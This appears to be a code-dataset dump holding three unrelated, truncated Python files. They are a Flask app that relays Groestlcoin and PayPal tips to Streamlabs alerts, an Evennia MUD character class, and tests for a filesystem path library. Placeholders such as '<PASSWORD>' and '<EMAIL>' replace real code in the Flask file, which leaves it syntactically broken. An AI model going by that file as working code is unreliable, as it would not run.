input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
<gh_stars>1-10
#!flask/bin/python
from flask import render_template, flash, redirect, session, url_for, \
request, g, send_file, abort, jsonify
from flask_login import current_user
from flask_qrcode import QRcode
from app import app, db, lm
from datetime import datetime, timedelta
from config import STREAMLABS_CLIENT_ID, STREAMLABS_CLIENT_SECRET, \
GROESTLTIP_REDIRECT_URI
from .forms import RegisterForm, ProfileForm
from .models import User, PayReq, Transaction
from pycoin_grs.key import Key
from pycoin_grs.key.validate import is_address_valid
from exchanges.bitstamp import Bitstamp
from exchanges.GRS_bittrex import GRS_price
from decimal import Decimal
from .payment import check_payment_on_address, check_address_history
import pprint
import json
import bitcoin
import requests
import time
import sys
import qrcode
import os
from werkzeug.datastructures import ImmutableOrderedMultiDict
streamlabs_api_url = 'https://www.twitchalerts.com/api/v1.0/'
api_token = streamlabs_api_url + 'token'
api_user = streamlabs_api_url + 'user'
api_tips = streamlabs_api_url + "donations"
api_custom = streamlabs_api_url + "alerts"
callback_result = 0
# @app.route('/_delete_transaction_history')
# def delete_transaction_history():
# Transaction.query.delete()
# db.session.commit()
# return redirect(url_for('history'))
# @app.route('/_delete_payreq_history')
# def delete_payreq_history():
# PayReq.query.delete()
# db.session.commit()
# return redirect(url_for('history'))
@app.route('/_verify_payment', methods=['POST'])
def verify_payment():
btc_addr = request.form['btc_addr']
social_id = request.form['social_id']
db.session.commit()
payrec_check = PayReq.query.filter_by(addr=btc_addr).first()
print("PAYMENT CHECK")
history_check = check_address_history(btc_addr)
payment_check_return = {
'transaction_found': None,
'payment_verified' : "FALSE",
'user_display' : User.query.filter_by(
social_id=social_id
).first().nickname
}
print("***" + "checking for history on: " + btc_addr + "***\n")
if history_check and payrec_check:
payment_check_return['payment_verified'] = "TRUE"
print("Payment Found!")
amount = check_payment_on_address(btc_addr)
print(amount)
payment_check_return['transaction_found'] = history_check[0]['tx_hash']
payment_notify(social_id,
payrec_check,
amount,
history_check[0]['tx_hash'],
btc_addr)
db.session.delete(payrec_check)
db.session.commit()
return jsonify(payment_check_return)
def payment_notify(social_id, payrec, balance, txhash, grs_addr):
'''
Exchange Rate json file contains:
'exchange' : BitStamp/BitFinex/Kraken/Etc
'rate' : USD-Pair Exchange Rate for BTC
'datetime' : timestamp of when last grabbed
'''
user = User.query.filter_by(social_id=social_id).first()
print(balance)
value = balance * GRS_price()
is_latest_exchange_valid = False
# if exchangerate.json doesnt already exists, create a new one
if not os.path.exists('exchangerate.json'):
f = open('exchangerate.json', 'w')
f.write("{}")
f.close()
with open("exchangerate.json", 'r') as f:
latestexchange = json.loads(f.read())
# if the file is valid ('datetime' key exists), go on and parse it
if 'datetime' in latestexchange:
latestexchange['datetime'] = datetime.strptime(
latestexchange['datetime'], '%Y-%m-%d %H:%M:%S.%f')
if (datetime.today() - latestexchange['datetime']) <= timedelta(hours=1):
print("using existing exchange rate")
is_latest_exchange_valid = True
exchange = latestexchange['rate']
# If we fail to get exchange rate from Bitstamp,
# use old, stored value.
print("Exchange rate too old! Grabbing exchange rate from Bitstamp")
try:
exchange = Bitstamp().get_current_price()
latestexchange = {
'exchange' : 'bitstamp',
'rate' : float(exchange),
'datetime' : str(datetime.today())
}
print("exchage rate data found!")
print(latestexchange)
with open('exchangerate.json', 'w') as f:
print("Opened exchange rate file for recording")
json.dump(latestexchange, f)
print("exchange rate recorded")
except:
if is_latest_exchange_valid:
exchange = latestexchange['rate']
else:
raise ValueError('No exchange rate available!')
# print("Converting Donation Amount to USD")
# print(value)
# print(exchange)
# print(type(value))
# print(type(exchange))
# print(float(exchange)/100000000)
usd_value = ((value) * float(exchange)/100000000)
usd_two_places = float(format(usd_value, '.2f'))
grs_amount = ((balance) /100000000)
#print(usd_two_places)
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : <PASSWORD>,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
#print("Acquiring Streamlabs Access Tokens")
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
#print("Tokens Acquired, Committing to Database")
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
grs_amount_display = " ("+ str(grs_amount) +" GRS Donated)"
if payrec.user_message:
msg=payrec.user_message
else:
msg=''
tip_call = {
'name' : payrec.user_display,
'identifier' : payrec.user_identifier,
'message' : msg+grs_amount_display,
'amount' : usd_two_places,
'currency' : 'USD',
'access_token' : tip_response['access_token'],
'skip_alert' : 'yes'
}
tip_check = requests.post(
api_tips,
data=tip_call,
headers=headers
).json()
donation = payrec.user_display +" donated " + str(grs_amount) + " GRS ($" + str(usd_two_places) + ")\n"
tip_call = {
'type' : 'donation',
'message' : donation+msg,
'image_href' : user.image_ref,
'sound_href' : user.sound_ref,
'duration' : 5000,
'special_text_color' : user.text_color,
'access_token' : tip_response['access_token']
}
print(tip_call)
tip_check = requests.post(
api_custom,
data=tip_call,
headers=headers
).json()
print(tip_check)
# custom_notify(social_id, payrec.user_message, value, usd_two_places)
print("Saving transaction data in database...")
# transaction = Transaction.query.filter_by(addr=btc_addr).first()
payreq = PayReq.query.filter_by(addr=grs_addr).first()
new_transaction = Transaction(
twi_user=payreq.user_display,
twi_message=payreq.user_message,
user_id=social_id,
tx_id=txhash,
amount=grs_amount,
timestamp=payreq.timestamp
)
db.session.add(new_transaction)
db.session.commit()
print("Transaction data saved!")
print("Donation Alert Sent")
return tip_check
@app.route('/_create_payreq', methods=['POST'])
def create_payment_request():
social_id = request.form['social_id']
deriv = User.query.filter_by(social_id = social_id).first(). \
latest_derivation
address = get_unused_address(social_id, deriv)
new_payment_request = PayReq(
address,
user_display=request.form['user_display'],
user_identifier=request.form['user_identifier']+"_grs",
user_message=request.form['user_message']
)
db.session.add(new_payment_request)
db.session.commit()
return jsonify(
{'btc_addr': address}
)
@app.route('/tip/<username>')
def tip(username):
u = User.query.filter_by(social_id=username.lower()).first()
if u:
try:
session_nickname = session['nickname']
except:
session_nickname = None
return render_template(
'tipv2.html',
session_nickname=session_nickname,
nickname = u.nickname,
social_id = u.social_id,
display_text = u.display_text,
email = u.paypal_email
)
else:
return render_template(
'404.html',
username=username
)
def get_unused_address(social_id, deriv):
'''
Need to be careful about when to move up the latest_derivation listing.
Figure only incrementing the database entry when blockchain activity is
found is the least likely to create large gaps of empty addresses in
someone's GRS Wallet.
'''
pp = pprint.PrettyPrinter(indent=2)
userdata = User.query.filter_by(social_id = social_id).first()
# Pull GRS Address from given user data
key = Key.from_text(userdata.xpub).subkey(0). \
subkey(deriv)
address = key.address(use_uncompressed=False)
# if is_address_valid(userdata.xpub) == "GRS":
# return "STREAMER SUBMITTED GRSADDR INSTEAD OF XPUB, PLEASE INFORM "\
# + "STREAMER OR DEVELOPER"
#
# if is_address_valid(address) != "GRS":
# return "NO VALID ADDRESS, PLEASE INFORM STREAMER OR DEVELOPER"
# Check for existing payment request, delete if older than 5m.
payment_request = PayReq.query.filter_by(addr=address).first()
if payment_request:
req_timestamp = payment_request.timestamp
now_timestamp = datetime.utcnow()
delta_timestamp = now_timestamp - req_timestamp
if delta_timestamp > timedelta(seconds=60*5):
db.session.delete(payment_request)
db.session.commit()
payment_request = None
pp.pprint(check_payment_on_address(address))
if not check_address_history(address):
if not payment_request:
return address
else:
print("Address has payment request...")
print("Address Derivation: ", deriv)
return get_unused_address(social_id, deriv + 1)
else:
print("Address has blockchain history, searching new address...")
print("Address Derivation: ", userdata.latest_derivation)
userdata.latest_derivation = userdata.latest_derivation + 1
db.session.commit()
return get_unused_address(social_id, deriv + 1)
'''
Testing code below, please ignore
'''
@app.route('/tiptest/<username>')
def tiptest(username):
u = User.query.filter_by(social_id=username.lower()).first()
if u:
return render_template(
'tiptemplate.html',
nickname = u.nickname,
social_id = u.social_id,
display_text = u.display_text
)
else:
return abort(404)
<EMAIL>('/customalerttest')
def custom_notify(social_id, user_message, value, usd_two_places):
user = User.query.filter_by(social_id=social_id).first()
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : user.streamlabs_rtoken,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
donation = " | " + social_id +" donated " + str(value) + " GRS($" + str(usd_two_places) + ")",
tip_call = {
'type' : 'donation',
'message' : user_message + str(donation),
'image_href' : '',
'sound_href' : 'https://uploads.twitchalerts.com/000/003/774/415/m_health.wav',
'duration' : 3,
'special_text_color' : '#42ff42',
'access_token' : tip_response['access_token']
}
tip_check = requests.post(
api_custom,
data=tip_call,
headers=headers
).json()
print(tip_check)
return "Hello World"
@app.route('/paypal', methods=['POST'])
def create_payment_request_paypal():
if (request.form['user_display'] == ""):
user_display = "AnonymousDonator"
else:
user_display = request.form['user_display']
user_identifier = request.form['user_identifier']
user_message = request.form['user_message']
amount = request.form['amount']
print(amount)
random = os.urandom(17)
print(random)
new_payment_request = PayReq(
address=random,
user_display=user_display,
user_identifier=user_identifier+"_paypal",
user_message=user_message,
amount=amount
)
db.session.add(new_payment_request)
db.session.commit()
return jsonify({'data' : 'Payment Request made for: '+user_display})
@app.route('/ipn/<username>/to/<social_id>', methods=['POST'])
def ipn(username,social_id):
payreq = PayReq.query.filter_by(user_display=username).order_by(PayReq.timestamp.desc()).first()
print(payreq)
try:
arg = ''
request.parameter_storage_class = ImmutableOrderedMultiDict
values = request.form
for x, y in values.items():
arg += "&{x}={y}".format(x=x,y=y)
validate_url = 'https://www.paypal.com' \
'/cgi-bin/webscr?cmd=_notify-validate{arg}' \
.format(arg=arg)
r = requests.get(validate_url)
print(r)
print(r.text)
if r.text == 'VERIFIED':
try:
#Paypal post
payer_email = request.form.get('payer_email')
unix = int(time.time())
payment_date = request.form.get('payment_date')
username = request.form.get('custom')
payment_fee = request.form.get('payment_fee')
payment_status = request.form.get('payment_status')
txn_id = request.form.get('txn_id')
# try:
if (payreq.user_display == "AnonymousGroestler"):
user_display = "AnonymousDonator"
else:
user_display = payreq.user_display
# except:
# return render_template(
# 'cancel.html'
# )
user_identifier = payreq.user_identifier
user_message = payreq.user_message
# if txn_id:
# print('got txn id from paypal user')
# else:
# txn_id =
user = User.query.filter_by(social_id=social_id).first()
token_call = {
'grant_type' : 'refresh_token',
'client_id' : STREAMLABS_CLIENT_ID,
'client_secret' : STREAMLABS_CLIENT_SECRET,
'refresh_token' : user.streamlabs_rtoken,
'redirect_uri' : GROESTLTIP_REDIRECT_URI
}
headers = []
#print("Acquiring Streamlabs Access Tokens")
tip_response = requests.post(
api_token,
data=token_call,
headers=headers
).json()
#print("Tokens Acquired, Committing to Database")
user.streamlabs_rtoken = tip_response['refresh_token']
user.streamlabs_atoken = tip_response['access_token']
db.session.commit()
#print("Tokens Committed to database, sending donation alert")
tip_call = {
'name' : user_display,
'identifier' : payreq.user_identifier,
'message' : payreq.user_message,
'amount' : payreq.amount,
'currency' : 'USD',
'access_token' : tip_response['access_token']
}
print(tip_call)
tip_check = requests.post(
api_tips,
data=tip_call,
headers=headers
).json()
print(tip_check)
# custom_notify(social_id, payrec.user_message, value, usd_two_places)
print("Donation Alert Sent")
new_transaction = Transaction(
twi_user=user_display,
twi_message=user_message,
user_id=social_id,
tx_id=payreq.addr,
amount=payreq.amount,
timestamp=datetime.utcnow()
)
db.session.add(new_transaction)
db.session.commit()
except Exception as e:
print('Likely IPN sent two responses, TX_ID only accepted once because its unique. Check TX_ID from PayReq and Transaction'+ str(e))
return r.text
except Exception as e:
print("ERROR:" + str(e))
return str(e)
@app.route('/confirmation/<username>/to/<social_id>', methods=['GET'])
def confirmation(username,social_id):
TX = Transaction.query.filter_by(user_id=social_id).order_by(Transaction.timestamp.desc()).first()
payreq = PayReq.query.filter_by(user_display=username).order_by(PayReq.timestamp.desc()).first()
if (TX.tx_id == payreq.addr):
payment_gross = TX.amount
status = 'Payment completed and verified.'
else:
payment_gross = payreq.amount
status = 'Payment completed but not yet verified. Keep checking history page to see if it appears. When it | |
"""
Template for Characters
Copy this module up one level and name it as you like, then
use it as a template to create your own Character class.
To make new logins default to creating characters
of your new type, change settings.BASE_CHARACTER_TYPECLASS to point to
your new class, e.g.
settings.BASE_CHARACTER_TYPECLASS = "game.gamesrc.objects.mychar.MyChar"
Note that objects already created in the database will not notice
this change, you have to convert them manually e.g. with the
@typeclass command.
"""
from ev import Character as DefaultCharacter
from game.gamesrc.world import body
from ev import logger
from ev import tickerhandler
from game.gamesrc.combat import wounds
from ev import create_script
from src.utils import utils, evtable
import re
from game.gamesrc.combat import move
MAX_HEALTH = 80
MAX_BLEED = MAX_HEALTH
class Character(DefaultCharacter):
"""
The Character is like any normal Object (see example/object.py for
a list of properties and methods), except it actually implements
some of its hook methods to do some work:
at_basetype_setup - always assigns the default_cmdset to this object type
(important!)sets locks so character cannot be picked up
and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_post_puppet(player) - when Player disconnects from the Character, we
store the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_pre_puppet - just before Player re-connects, retrieves the character's
old location and puts it back on the grid with a "charname
has connected" message echoed to the room
"""
def at_object_creation(self):
"""
Called only at initial creation.
* Static health/stamina because there's no such things as stats/skills.
* Ch_state refers to what state they exist in on the game.
0 = dead
1 = alive
2 = suspended
* Boolean approved value refers to whether they've been approved for play.
Default value is False.
"""
####################################################################
# Stats
####################################################################
self.db.state = 1 # 1 is alive, 2 is unconscious, 3 is dead
self.db.max_health = MAX_HEALTH
self.db.health = MAX_HEALTH
self.db.max_bleed = self.db.max_health
self.db.move_wrapper = move.BAREHANDED_WRAPPER
# Current weight of items held
self.db.curr_weight = 0
# Encumbrance limit
self.db.max_weight = 300
# wielding
self.db.wielding = {"main": None, "off": None}
self.db.holding = []
self.db.holding_capacity = 2
# wounds
self.db.wounds = []
# character approved status - default is not approved
self.db.ch_approved = False
# sdesc/ldesc/keywords
self.db.sdesc = "an entity"
self.db.ldesc = "An entity is here, not formed into being yet."
self.db.race = "Raceless"
# Body holds information to what wearlocs are available to the character
self.db.settings = {"stance": "balanced"}
# and information about what could be worn over what (layered clothing)
self.db.body = body.human_body
# Initiate what they're wearing, which should be nothing.
self.db.equipped = {}
self.db.sex = "sexless"
self.db.default_weapon = {
"name": "fists",
"min": 1,
"max": 3,
"type": "blunt",
"dmg_bonus": 0,
"crit": 0.0,
"hands": 1,
"quality": 1}
for part in self.db.body:
self.db.equipped[part.name] = {}
if part.armor:
self.db.equipped[part.name]["armor"] = None
if part.clothing:
self.db.equipped[part.name]["clothing"] = None
def aliasify(self):
"""
This is used to generate a list of aliases based on our key.
This is particularly useful for objects that we need to generate
aliases or 'keywords' for so we can reference them.
"""
# generate a list of keywords for our alias
pre_aliases = self.db.sdesc.split(" ")
old_aliases = self.aliases.all()
new_aliases = [alias.strip().lower() for alias in pre_aliases
if alias.strip() and not
re.match("(\b[aA][n]|\b[tT]he|^[aA]$)", alias)]
old_aliases.extend(new_aliases)
aliases = list(set(old_aliases))
self.aliases.add(aliases)
def announce_move_from(self, destination):
"""
Called if the move is to be announced. This is
called while we are still standing in the old
location.
destination - the place we are going to.
"""
if not self.location:
return
name = self.name
loc_name = ""
loc_name = self.location.name
dest_name = destination.name
string = "\n%s is leaving %s, heading for %s.\n"
self.location.msg_contents(string % (name, loc_name, dest_name), exclude=self)
def announce_move_to(self, source_location):
"""
Called after the move if the move was not quiet. At this
point we are standing in the new location.
source_location - the place we came from
"""
name = self.name
if not source_location and self.location.has_player:
# This was created from nowhere and added to a player's
# inventory; it's probably the result of a create command.
string = "You now have %s in your possession." % name
self.location.msg(string)
return
src_name = "nowhere"
loc_name = self.location.name
if source_location:
src_name = source_location.name
string = "\n%s arrives to %s from %s.\n"
self.location.msg_contents(string % (name, loc_name, src_name), exclude=self)
#def msg(self, text=None, from_obj=None, sessid=0, pers=False,
# **kwargs):
"""
Overloaded msg method that properly capitalizes all the messages
the character gets. It makes sure that if there's a color code,
it properly capitalizes it anyways.
"""
"""
if pers:
# to do, replacing any mentions of sdescs with you/yours
# and also replacing any mentions of his/her/its with your
# if it follows the sdesc.
# replaces any mentions of sdesc's with your
text = text.replace("{M" + self.db.sdesc + "{n's", "your")
# replaces any mentions of sdesc with you
text = text.replace("{M" + self.db.sdesc + "{n", "you")
split_str = text.split(" ")
indices = []
for x in range(len(split_str)):
match = re.match("(you[rs]*)", split_str[x])
if match:
indices.append(x)
for index in indices:
if index == 0:
split_str[index] = "{M%s{n" % \
(split_str[index].capitalize())
elif split_str[index] == split_str[-1]:
split_str[index] = "{M%s{n" % \
(split_str[index])
else:
try:
prev_ind = index - 1
if split_str[prev_ind][-1] in "s" and \
"ss" not in split_str[prev_ind][-2:]:
split_str[prev_ind] = split_str[prev_ind][0:-1]
except:
pass
text = " ".join(split_str)
rtn = re.split('([.!?] *)', text)
for x in range(len(rtn)):
if rtn[x].startswith("{") and len(rtn[x]) > 3:
rtn[x] = rtn[x][0:1] + rtn[x][2].capitalize() + rtn[x][3:]
elif len(rtn[x]) > 1:
rtn[x] = rtn[x][0].capitalize() + rtn[x][1:]
else:
rtn[x] = rtn[x].capitalize()
if rtn:
text = "".join(rtn)
"""
#self.dbobj.msg(text=text, from_obj=from_obj, sessid=sessid, **kwargs)
def return_appearance(self, pobject):
string = ""
if not pobject:
return
# get and identify all objects
visible = (con for con in self.contents
if con != pobject and con.access(pobject, "view"))
exits, users, things = [], [], []
for con in visible:
key = con.key
if con.destination:
exits.append(key)
elif con.has_player:
if con.ndb.combat_handler:
vict_sdesc = con.ndb.combat_handler.pairs[con].db.sdesc
users.append("{M%s{n is currently {Rfighting{n {M%s{n!" % (con.db.sdesc.capitalize(), vict_sdesc))
else:
users.append(" {M%s{n" % (con.db.sdesc))
# get description, build string
desc = self.db.desc
char_wounds = [char_wound for char_wound in self.db.wounds if
isinstance(char_wound, wounds.Wound)]
if desc:
string += "%s\n" % desc
if char_wounds:
string += "\n{M%s{n suffers from the following wounds: " % (self.db.sdesc.capitalize())
wound_str = ""
for char_wound in char_wounds:
if not char_wounds[-1] == char_wound:
wound_str += str(char_wound) + ", "
else:
wound_str += str(char_wound) + "."
string += wound_str + "\n"
if exits:
string += "\n{wExits:{n " + ", ".join(exits) + "\n"
if self.db.holding:
h_table = evtable.EvTable(border=None)
things = [item.db.sdesc for item in self.db.holding if item]
for thing in things:
h_table.add_row("{w(holding in hand){n " + "{G%s{n" % (thing))
string += "\n\n%s" % (h_table)
items = [item for (part, item) in self.db.equipped.items() if
item["armor"] or item["clothing"]]
if self.db.wielding.values():
w_table = evtable.EvTable(border=None)
mwielding_str = None
owielding_str = None
if self.db.wielding["main"] and \
self.db.wielding["main"].db.hands > 1:
mwielding_str = "(wielding in both hands) {G%s{n" % \
(self.db.wielding["main"].db.sdesc)
elif self.db.wielding["main"]:
mwielding_str = "(wielding in main-hand) {G%s{n" % \
(self.db.wielding["main"].db.sdesc)
if self.db.wielding["main"] and self.db.wielding["main"].db.broken:
mwielding_str += " {R(broken){n"
if self.db.wielding["off"]:
owielding_str = "(wielding in off-hand) {G%s{n" % \
(self.db.wielding["off"].db.sdesc)
if self.db.wielding["off"] and self.db.wielding["off"].db.broken:
owielding_str += " {R[broken]{n"
if mwielding_str:
w_table.add_row(mwielding_str)
if owielding_str:
w_table.add_row(owielding_str)
table_str = "\n%s" % (w_table)
string += table_str
if any(items):
e_table = evtable.EvTable(border=None)
# need to get the actual order that the items should be in
# when the equipped table is put together
# eg. head, torso, arms, hands, legs, feet
body_order = [
(self.db.body[self.db.body.index(bodypart)].order_vis,
bodypart) for bodypart in self.db.equipped.keys()]
# sort the body order now
body_order = sorted(body_order, key=lambda body_o: body_o[0])
# we only want the bodypart now, not the number since it's ordered
body_order = [part[1] for part in body_order]
for part in body_order:
if self.db.equipped[part]["armor"]:
e_table.add_row("(worn over %s)" % (part) + " {G%s{n" %
(self.db.equipped[part]["armor"].db.sdesc))
elif self.db.equipped[part]["clothing"]:
| |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import ast
import errno
import json
import os
import subprocess
import sys
import tempfile
import threading
import unittest
from dataclasses import dataclass
from io import StringIO
from typing import AnyStr, Dict, Iterator, Optional
from ..common import byteme, check_popen_returncode
from ..fs_utils import (
Path,
create_ro,
generate_work_dir,
open_for_read_decompress,
populate_temp_dir_and_rename,
populate_temp_file_and_rename,
temp_dir,
)
_BAD_UTF = b"\xc3("
class TestFsUtils(unittest.TestCase):
def test_path_basics(self):
self.assertEqual(
byteme(os.getcwd()) + b"/foo/bar", Path("foo/bar").abspath()
)
self.assertEqual(b"/a/c", Path("/a/b/../c").realpath())
self.assertEqual(b"foo/bar", Path("foo") / "bar")
self.assertEqual(b"/foo/bar", b"/foo" / Path.or_none("bar"))
self.assertEqual(b"/baz", b"/be/bop" / Path(b"/baz"))
self.assertEqual("file:///a%2Cb", Path("/a,b").file_url())
self.assertEqual(b"bom", Path("/bim/bom").basename())
self.assertEqual(b"/bim", Path("/bim/bom").dirname())
self.assertEqual(b"ta/da", Path("./ta//gr/../da/").normpath())
self.assertEqual(b"/a/c", Path("/a/b/../c").realpath())
self.assertEqual(b"../c/d/e", Path("/a/b/c/d/e").relpath("/a/b/x"))
self.assertEqual(b"../../../y/z", Path("/y/z").relpath("/a/b/x"))
self.assertEqual(Path("foo"), Path("foo"))
self.assertIsNone(Path.or_none(None))
with self.assertRaises(TypeError):
Path("foo") == "foo"
with self.assertRaises(TypeError):
Path("foo") != "foo"
with self.assertRaises(TypeError):
Path("foo") > "foo"
with self.assertRaises(TypeError):
Path("foo") >= "foo"
with self.assertRaises(TypeError):
Path("foo") < "foo"
with self.assertRaises(TypeError):
Path("foo") <= "foo"
def test_path_is_hashable(self):
# Path must be hashable to be added to a set
ts = set()
ts.add(Path("foo"))
def test_bad_utf_is_bad(self):
with self.assertRaises(UnicodeDecodeError):
_BAD_UTF.decode()
def test_path_decode(self):
with tempfile.TemporaryDirectory() as td:
bad_utf_path = Path(td) / _BAD_UTF
self.assertTrue(bad_utf_path.endswith(b"/" + _BAD_UTF))
with open(bad_utf_path, "w"):
pass
res = subprocess.run(
[
sys.executable,
"-c",
f"import os;print(os.listdir({repr(td)}))",
],
stdout=subprocess.PIPE,
)
# Path's handling of invalid UTF-8 matches the default for
# Python3 when it gets such data from the filesystem.
self.assertEqual(
# Both evaluate to surrogate-escaped ['\udcc3('] plus a newline.
repr([bad_utf_path.basename().decode()]) + "\n",
res.stdout.decode(),
)
def test_path_exists(self):
does_not_exist = Path("non/existent")
for err in [True, False]:
self.assertFalse(does_not_exist.exists(raise_permission_error=err))
with temp_dir() as td:
i_exist = td / "cogito_ergo_sum"
i_exist.touch()
for err in [True, False]:
self.assertTrue(i_exist.exists(raise_permission_error=err))
if os.geteuid() == 0:
return # Skip "permission error" tests, `root` can see all.
old_mode = os.stat(td).st_mode
try:
os.chmod(td, 0)
self.assertFalse(i_exist.exists(raise_permission_error=False))
with self.assertRaises(PermissionError):
i_exist.exists(raise_permission_error=True)
finally:
os.chmod(td, old_mode)
def test_path_islink(self):
with temp_dir() as td:
target = td / "target"
link = td / "link"
# Real files aren't symlinks
self.assertFalse(target.islink())
os.symlink(target, link)
# Broken symlinks are still symlinks
self.assertTrue(link.islink())
# Non-broken symlinks are symlinks :)
target.touch()
self.assertTrue(link.islink())
def test_path_readlink(self):
with temp_dir() as td:
target = td / "target"
link = td / "link"
os.symlink(target, link)
self.assertEqual(target, link.readlink())
def test_path_wait_for(self):
with tempfile.TemporaryDirectory() as td:
to_wait_for = Path(td) / "will_you_wait_for_me"
def _make_file():
to_wait_for.touch()
t = threading.Timer(0.1, _make_file)
t.start()
# This will return without an exception
elapsed_ms = to_wait_for.wait_for(timeout_ms=100000)
self.assertTrue(elapsed_ms > 0)
# Just to be sure
t.cancel()
# Reset the file to re-run the test for negative assertion
os.unlink(to_wait_for)
with self.assertRaises(FileNotFoundError):
to_wait_for.wait_for(timeout_ms=100)
def test_path_format(self):
first = Path("a/b")
second = Path(_BAD_UTF)
formatted = "^a/b >" + _BAD_UTF.decode(errors="surrogateescape")
self.assertEqual(formatted, f"^{first:10}>{second}")
def test_path_from_argparse(self):
res = subprocess.run(
[
sys.executable,
"-c",
"import sys;print(repr(sys.argv[1]))",
_BAD_UTF,
],
stdout=subprocess.PIPE,
)
# Demangle non-UTF bytes in the same way that `sys.argv` mangles them.
self.assertEqual(
_BAD_UTF,
Path.from_argparse(
ast.literal_eval(res.stdout.rstrip(b"\n").decode())
),
)
def test_normalized_subpath(self):
for p in [Path("/need/not/exist"), Path("something/relative")]:
self.assertEqual(p, p.normalized_subpath("."))
for bad_path in ["..", "a/../../b/c/d", "../c/d/e"]:
with self.assertRaisesRegex(AssertionError, "is outside of"):
p.normalized_subpath(bad_path)
self.assertEqual(
p.normalized_subpath("a/b"), p.normalized_subpath("/a/b/.")
)
self.assertEqual(b"a/b", p.normalized_subpath("a/b").relpath(p))
def test_path_json(self):
# We can serialize `Path` to JSON, including invalid UTF-8.
# Unfortunately, `json` doesn't allow us to custom-serialize keys.
obj_in = {"a": Path("b"), "c": Path(_BAD_UTF), "builtin": 3}
# Deserializing to `Path` requires the consumer to know the type
# schema.
obj_out = {
"a": "b",
"c": _BAD_UTF.decode(errors="surrogateescape"),
"builtin": 3,
}
self.assertEqual(obj_out, json.loads(Path.json_dumps(obj_in)))
f = StringIO()
Path.json_dump(obj_in, f)
f.seek(0)
self.assertEqual(obj_out, json.load(f))
with self.assertRaises(TypeError):
Path.json_dumps({"not serializable": object()})
def test_path_listdir(self):
with temp_dir() as td:
(td / "a").touch()
(a,) = td.listdir()
self.assertIsInstance(a, Path)
self.assertEqual(b"a", a)
def test_path_parse_args(self):
p = argparse.ArgumentParser()
p.add_argument("--path", action="append", type=Path.from_argparse)
# Check that `Path` is now allowed, and that we can round-trip bad UTF.
argv = ["--path", Path("a"), "--path", Path(_BAD_UTF)]
with self.assertRaises(TypeError):
p.parse_args(argv)
args = Path.parse_args(p, argv)
self.assertEqual([Path("a"), Path(_BAD_UTF)], args.path)
def test_path_read_text(self):
with temp_dir() as td:
tmp_path = Path(td / "foo.txt")
with open(tmp_path, "w+") as f:
f.write("hello\n")
self.assertEqual("hello\n", tmp_path.read_text())
def test_path_open(self):
with temp_dir() as td:
tmp_path = Path(td / "foo.txt")
with tmp_path.open(mode="w+") as f:
f.write("hello\n")
with tmp_path.open() as f:
self.assertEqual("hello\n", f.read())
def test_path_shell_quote(self):
self.assertEqual(
Path(r"""/a\ b/c d/e'"f/( \t/""").shell_quote(),
r"""'/a\ b/c d/e'"'"'"f/( \t/'""",
)
def test_path_str(self):
self.assertEqual("a/b", str(Path("a/b")))
self.assertEqual(
_BAD_UTF.decode(errors="surrogateescape"), str(Path(_BAD_UTF))
)
def test_path_has_leading_dot_dot(self):
self.assertTrue(Path("..").has_leading_dot_dot())
self.assertTrue(Path("../a/b/c").has_leading_dot_dot())
self.assertFalse(Path("..a/b/c").has_leading_dot_dot())
self.assertFalse(Path("a/../b/c").has_leading_dot_dot())
# This shows that we don't normalize, thus this function does not
# check whether the relative path refers outside of its base.
self.assertFalse(Path("a/../../b/c").has_leading_dot_dot())
def test_path_touch(self):
with temp_dir() as td:
tmp_path = td / "touchme"
tmp_path.touch()
self.assertTrue(os.path.exists(tmp_path))
def test_path_validate(self):
result = "a/b"
for validator in Path.__get_validators__():
result = validator(result)
self.assertEqual(result, Path("a/b"))
self.assertIsInstance(result, Path)
def test_open_for_read_decompress(self):
# The goal is that our stream should be bigger than any buffers
# involved (so we get to test edge effects), but not so big that the
# test takes more than 1-2 seconds.
n_bytes = 12 << 20 # 12MiB
my_line = b"kitteh" * 700 + b"\n" # ~ 4KiB
for compress, ext in [("gzip", "gz"), ("zstd", "zst")]:
filename = "kitteh." + ext
with temp_dir() as td, open(td / filename, "wb") as outf:
with subprocess.Popen(
[compress, "-"], stdin=subprocess.PIPE, stdout=outf
) as proc:
for _ in range(n_bytes // len(my_line)):
proc.stdin.write(my_line)
check_popen_returncode(proc)
with open_for_read_decompress(td / filename) as infile:
for l in infile:
self.assertEqual(my_line, l)
# Test that an incomplete read doesn't cause SIGPIPE
with open_for_read_decompress(td / filename) as infile:
pass
# Test uncompressed
with temp_dir() as td:
with open(td / "kitteh", "wb") as outfile:
outfile.write(my_line + b"meow")
with open_for_read_decompress(td / "kitteh") as infile:
self.assertEqual(my_line + b"meow", infile.read())
# Test decompression error
with temp_dir() as td:
with open(td / "kitteh.gz", "wb") as outfile:
outfile.write(my_line)
with self.assertRaises(
subprocess.CalledProcessError
), open_for_read_decompress(td / "kitteh.gz") as infile:
infile.read()
def test_create_ro(self):
with temp_dir() as td:
with create_ro(td / "hello_ro", "w") as out_f:
out_f.write("world_ro")
with open(td / "hello_rw", "w") as out_f:
out_f.write("world_rw")
# `_create_ro` refuses to overwrite both RO and RW files.
with self.assertRaises(FileExistsError):
create_ro(td / "hello_ro", "w")
with self.assertRaises(FileExistsError):
create_ro(td / "hello_rw", "w")
# Regular `open` can accidentelly clobber the RW, but not the RW.
if os.geteuid() != 0: # Root can clobber anything :/
with self.assertRaises(PermissionError):
open(td / "hello_ro", "a")
with open(td / "hello_rw", "a") as out_f:
out_f.write(" -- appended")
with open(td / "hello_ro") as in_f:
